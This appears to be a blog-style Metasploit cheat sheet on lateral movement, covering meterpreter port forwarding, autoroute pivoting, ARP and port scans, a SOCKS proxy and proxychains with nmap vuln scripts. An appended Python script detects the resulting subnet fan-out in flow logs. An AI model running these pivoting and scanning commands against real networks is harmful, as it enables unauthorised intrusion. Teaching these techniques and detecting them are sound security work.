MSF lateral movement: MSF port forwarding + routing table + SOCKS5 + proxychains
2022-07-06 10:01:00 【西湖第一剑】
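Some MSF post-exploitation operations
Port forwarding
meterpreter > portfwd add -l 2222 -r 172.16.1.156 -p 3389 # forward port 3389 on target host 172.16.1.156 to local port 2222
meterpreter > portfwd list # list the forwarding rules
meterpreter > portfwd flush # clear the forwarding list
rdesktop 127.0.0.1:2222 # from Kali, open the remote desktop through port 2222
Adding routes for lateral movement (attacking across network segments)
run autoroute -s 172.16.2.0/24 # add a route to the target environment's network
run autoroute -p # view the added routes
route print # print the routing table
run post/windows/gather/arp_scanner RHOSTS=172.16.2.0/24 # scan the whole segment for live hosts
run auxiliary/scanner/portscan/tcp RHOSTS=172.16.2.11 PORTS=3389 # check whether the IP has port 3389 open
Using an ARP scan to discover hosts on the internal network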
use post/windows/gather/arp_scanner
set rhosts 172.16.2.0/24
set session 1
exploit
SOCKS proxy
Newer versions of msf differ from older ones, and the proxy module is different as well.
auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set srvport 7777
srvport => 7777
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
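Configuring proxychains
Connect to the established SOCKS tunnel with a proxy client, and the internal network becomes reachable.
vi /etc/proxychains.conf # add: socks5 127.0.0.1 7777
proxychains + nmap: scan a host for vulnerabilities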
proxychains nmap -sT -Pn -p445 --script=vuln 192.168.52.141
Using the msf framework through proxychains
proxychains msfconsole
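Traffic sent over an autoroute route or the SOCKS proxy reaches the internal network from the compromised host, so the 3389/445 scans above appear in flow logs as one internal source fanning out across another subnet. The following is an added example for defenders, not part of the original article, that flags this pattern; the record format, host addresses, window and threshold are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Constructed flow records: timestamp, source, destination, destination port (all values made up).
SAMPLE_FLOWS = """\
2022-07-06T10:00:01 172.16.1.10 172.16.2.11 3389
2022-07-06T10:00:02 172.16.1.10 172.16.2.12 3389
2022-07-06T10:00:03 172.16.1.10 172.16.2.13 445
2022-07-06T10:00:04 172.16.1.10 172.16.2.14 445
2022-07-06T10:00:05 172.16.1.10 172.16.2.15 3389
2022-07-06T10:00:06 172.16.1.20 172.16.2.5 445
2022-07-06T10:06:00 172.16.1.30 172.16.1.156 3389
"""

WATCHED_PORTS = {445, 3389}      # ports probed in the article's scans
WINDOW = timedelta(seconds=60)   # assumed sliding window
THRESHOLD = 5                    # assumed: distinct destinations that raise an alert


def parse_flows(text):
    """Yield (timestamp, src, dst, port) tuples from whitespace-separated lines."""
    for line in text.splitlines():
        if line.strip():
            ts, src, dst, port = line.split()
            yield datetime.fromisoformat(ts), ip_address(src), ip_address(dst), int(port)


def find_fanout(flows, window=WINDOW, threshold=THRESHOLD):
    """Return {source: peak distinct destinations outside its own /24, on watched ports}."""
    per_src = defaultdict(list)
    for ts, src, dst, port in flows:
        if port in WATCHED_PORTS and dst not in ip_network(f"{src}/24", strict=False):
            per_src[str(src)].append((ts, dst))
    alerts = {}
    for src, events in per_src.items():
        events.sort()
        start = 0
        for end, (ts, _) in enumerate(events):
            while ts - events[start][0] > window:   # drop events older than the window
                start += 1
            distinct = len({dst for _, dst in events[start:end + 1]})
            if distinct >= threshold:
                alerts[src] = max(alerts.get(src, 0), distinct)
    return alerts


if __name__ == "__main__":
    print(find_fanout(parse_flows(SAMPLE_FLOWS)))
```

On the constructed records, only 172.16.1.10 is reported; the single file-share connection from 172.16.1.20 and the same-subnet RDP session are ignored.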